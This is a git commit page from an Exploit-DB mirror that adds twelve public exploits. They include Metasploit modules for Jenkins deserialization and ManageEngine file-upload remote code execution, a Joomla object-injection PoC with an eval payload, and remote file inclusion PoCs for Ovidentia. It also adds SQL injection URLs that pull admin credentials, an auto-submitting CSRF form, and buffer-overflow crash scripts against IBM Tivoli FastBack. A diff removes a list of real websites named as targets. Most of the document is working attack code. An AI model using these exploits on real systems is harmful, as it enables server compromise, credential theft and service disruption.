bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-16

Browse source 
12 new exploits
This commit is contained in:
Offensive Security 2015-12-16 05:03:13 +00:00
parent 538f42e815
commit 3dc44f0ce3
14 changed files with 1029 additions and 16 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -35232,3 +35232,15 @@ id,file,description,date,author,platform,type,port
38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0
38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80
38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80
38977,platforms/php/remote/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,remote,0
38978,platforms/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460
38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
38988,platforms/php/webapps/38988.txt,"Dredge School Administration System /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion Vulnerabilities",2015-12-15,bd0rk,php,webapps,80

Can't render this file because it is too large.

263
platforms/java/remote/38983.rb Executable file
View file

@ -0,0 +1,263 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins master, which allows remote arbitrary code execution. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Christopher Frohoff', # Vulnerability discovery
'Steve Breen', # Public Exploit
'Dev Mohanty', # Metasploit module
'Louis Sato', # Metasploit
'William Vu', # Metasploit
'juan vazquez', # Metasploit
'Wei Chen' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-8103'],
['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Jenkins 1.637', {} ]
],
'DisclosureDate' => 'Nov 18 2015',
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
end
def exploit
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
invoke_remote_method(class_load_payload)
end
# This is from the HttpClient mixin. But since this module isn't actually exploiting
# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.
def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def check
result = Exploit::CheckCode::Safe
begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
result
end
def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
unless http_headers['X-Jenkins-CLI-Port']
vprint_error('The server does not have the CLI port that is needed for exploitation.')
return false
end
if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
return true
end
false
end
# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout']
else
actual_timeout = opts[:timeout] || timeout
end
begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, actual_timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))
vprint_status(socket.recv(1024))
vprint_status(socket.recv(1024))
encoded_payload0 = read_bin_file('serialized_payload_header')
encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
encoded_payload2 = read_bin_file('serialized_payload_footer')
encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
print_status "Sending payload length: #{encoded_payload.length}"
socket.put(encoded_payload)
ensure
disconnect(socket)
end
end
def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
#
def set_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_payload_into_stream(decoded).encode
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
#
def class_load_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_class_loader_into_stream(decoded).encode
end
def inject_class_loader_into_stream(decoded)
file_name_utf8 = get_array_chain(decoded)
.values[2]
.class_data[0]
.values[1]
.values[0]
.values[0]
.class_data[3]
file_name_utf8.contents = get_random_file_name
file_name_utf8.length = file_name_utf8.contents.length
class_name_utf8 = get_array_chain(decoded)
.values[4]
.class_data[0]
.values[0]
class_name_utf8.contents = 'metasploit.Payload'
class_name_utf8.length = class_name_utf8.contents.length
decoded
end
def get_random_file_name
@random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
end
def inject_payload_into_stream(decoded)
byte_array = get_array_chain(decoded)
.values[2]
.class_data
.last
byte_array.values = payload.encoded.bytes
file_name_utf8 = decoded.references[44].class_data[0]
rnd_fname = get_random_file_name
register_file_for_cleanup(rnd_fname)
file_name_utf8.contents = rnd_fname
file_name_utf8.length = file_name_utf8.contents.length
decoded
end
def get_array_chain(decoded)
object = decoded.contents[0]
lazy_map = object.class_data[1].class_data[0]
chained_transformer = lazy_map.class_data[0]
chained_transformer.class_data[0]
end
def read_bin_file(bin_file_path)
data = ''
File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
data = f.read
end
data
end
end

212
platforms/jsp/remote/38982.rb Executable file
View file

@ -0,0 +1,212 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When
uploading a 7z file, the FileUploadServlet class does not check the user-controlled
ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to
inject a null bye at the end of the value to create a malicious file with an arbitrary
file type, and then place it under a directory that allows server-side scripts to run,
which results in remote code execution under the context of SYSTEM.
Please note that by default, some ManageEngine Desktop Central versions run on port 8020,
but older ones run on port 8040. Also, using this exploit will leave debugging information
produced by FileUploadServlet in file rdslog0.txt.
This exploit was successfully tested on version 9, build 90109 and build 91084.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],
[ 'CVE', '2015-8249']
],
'Platform' => 'win',
'Targets' =>
[
[ 'ManageEngine Desktop Central 9 on Windows', {} ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Dec 14 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
Opt::RPORT(8020)
], self.class)
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def get_jsp_stager
exe = generate_payload_exe(code: payload.encoded)
jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# pwd: C:\ManageEngine\DesktopCentral_Server\bin
# targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")
{
jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
jsp_name: jsp_fname
}
end
def get_build_number(res)
inputs = res.get_hidden_inputs
# The buildNum input is in the first form
inputs.first['buildNum']
end
def get_html_title(res)
html = res.body
n = ::Nokogiri::HTML(html)
n.at_xpath('//title').text
end
def check
uri = normalize_uri(target_uri.path, '/configurations.do')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
build_number = get_build_number(res)
vprint_status("Found build number: #{build_number}")
html_title = get_html_title(res)
vprint_status("Found title: #{html_title}")
if build_number <= '91084'
return Exploit::CheckCode::Appears
elsif /ManageEngine Desktop Central/ === html_title
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def upload_jsp(stager_info)
# connectionId is part of the 7z filename
# computerName is part of the 7z filename (but will be used due to the null byte injection)
# customerId is used as a directory name
#
# The intended upload path is:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z
# But this will upload to:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
uri = normalize_uri(target_uri.path, 'fileupload')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/octet-stream',
'encode_params' => false,
'data' => stager_info[:jsp_payload],
'vars_get' => {
'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00",
'resourceId' => Rex::Text.rand_text_alpha(1),
'action' => 'rds_file_upload',
'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
'customerId' => Rex::Text.rand_text_numeric(rand(10)+5)
}
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
end
end
def exec_jsp(stager_info)
uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
end
end
def exploit
print_status("Creating JSP stager")
stager_info = get_jsp_stager
print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
upload_jsp(stager_info)
print_status("Executing stager...")
exec_jsp(stager_info)
end
end

44
platforms/php/remote/38977.py Executable file
View file

@ -0,0 +1,44 @@
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests # easy_install requests
def get_url(url, user_agent):
headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
pl = generate_payload("system('touch /tmp/fx');")
print get_url("http://172.31.6.242/", pl)

18
platforms/php/webapps/28564.txt
View file

@ -17,10 +17,6 @@ Cross Site Scripting
http://site-target/search.php?s=[XSS]
Example
http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>
#XSS at Page Admin
@ -36,18 +32,8 @@ http://site-target/search.php?s=[SQL Injection]
Example
http://www.freearticle.com.au/feed.php?cat=100'
http://www.freearticle.com.au/search.php?s=123'
http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'
====================================================================================
Example Target
http://freearticle.com.au/feed.php?cat=100'
http://alfithrah99.net/artikel/feed.php?cat=2'
http://demos1.softaculous.com/ArticleSetup/feed.php?cat=100'
http://oromodictionary.com/articles/feed.php?cat=1'
http://beingshoppers.com/article/feed.php?cat=44'
http://acheon.eu/article/feed.php?cat=54'
http://sitevena.com/feed.php?cat=12'
http://www.articleshub.in/feed.php?cat=10'

26
platforms/php/webapps/38981.txt Executable file
View file

@ -0,0 +1,26 @@
# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
Proof-of-Concept:
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
---------------------------------------------------------------
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
So an attacker can use this to execute some php-shellcode for example.
### The 27 years old, german hacker bd0rk ###

20
platforms/php/webapps/38985.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff

20
platforms/php/webapps/38986.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/DSM/loader.php?load=data export
send&tableid=3" class="button white">Export Accounts</a></label>
</html>

27
platforms/php/webapps/38987.html Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
[Change Password & Email Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.example.com/DSM/loader.php?load=account settings">
<input type="hidden" name="AccessCode" value="123456" />
<input type="hidden" name="ConfirmAccessCode" value="123456" />
<input type="hidden" name="Email" value="email@hotmail.com" />
<input type="hidden" name="MM_update" value="form2" />
</form>
</body>
</html>

39
platforms/php/webapps/38988.txt Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
II. Backup Download
##############
VULNERABILITY
##############
/Backup/processbackup.php (LINE: 89-93)
-----------------------------------------------------------------------------
//save file
// $handle =
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
1. Open http://www.example.com/DSM/Backup/processbackup.php
2. When you open the link produces RecordManager.sql
3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql]

42
platforms/php/webapps/38989.txt Executable file
View file

@ -0,0 +1,42 @@
# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
PoC1:
/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
Description: The $babInstallPath-parameter isn't declared before include.
So an attacker can execute evil-code 'bout this.
PoC2:
/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------
[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
Description: The problem is the same as the first. -.-
It's possible to compromise the system.
### The 27 years old, german hacker bd0rk ###
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm

92
platforms/windows/dos/38978.py Executable file
View file

@ -0,0 +1,92 @@
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# Invalid Pointer Dereference
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Crash:
# ======
#
# (f60.654): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=01bf4fb8 ecx=41414141 edx=41414141 esi=01bf4fb8 edi=00000000
# eip=0063d84a esp=01dce0c8 ebp=01dce0cc iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# FastBackServer!CLocation::GetLocationParams+0xa:
# 0063d84a 8b4004 mov eax,dword ptr [eax+4] ds:0023:41414145=????????
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode = 0x537,
p1 = "A" * 24000,
p2 = "B" * 24000,
p3 = "C" * 1000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
if __name__ == "__main__":
main()

115
platforms/windows/dos/38979.py Executable file
View file

@ -0,0 +1,115 @@
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_SetConfFileChunk
# function caused by the insecure usage of _sscanf while parsing user-controlled
# input.
#
# .text:00578D28 lea eax, [ebp+var_8]
# .text:00578D2B push eax
# .text:00578D2C lea ecx, [ebp+var_C]
# .text:00578D2F push ecx
# .text:00578D30 lea edx, [ebp+var_318]
# .text:00578D36 push edx
# .text:00578D37 lea eax, [ebp+var_4]
# .text:00578D3A push eax
# .text:00578D3B lea ecx, [ebp+Str1] <=== Buffer that will be overwritten
# .text:00578D41 push ecx
# .text:00578D42 push offset $SG128695 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:00578D47 mov edx, [ebp+Src]
# .text:00578D4A push edx ; Src <=== Buffer under our control
# .text:00578D4B call _sscanf <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (a20.ee8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01eaca78 edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01eae324 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 41414141 ?? ???
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode=0x534,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
p2 = "B" * 24000,
p3 = "C" * 24000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
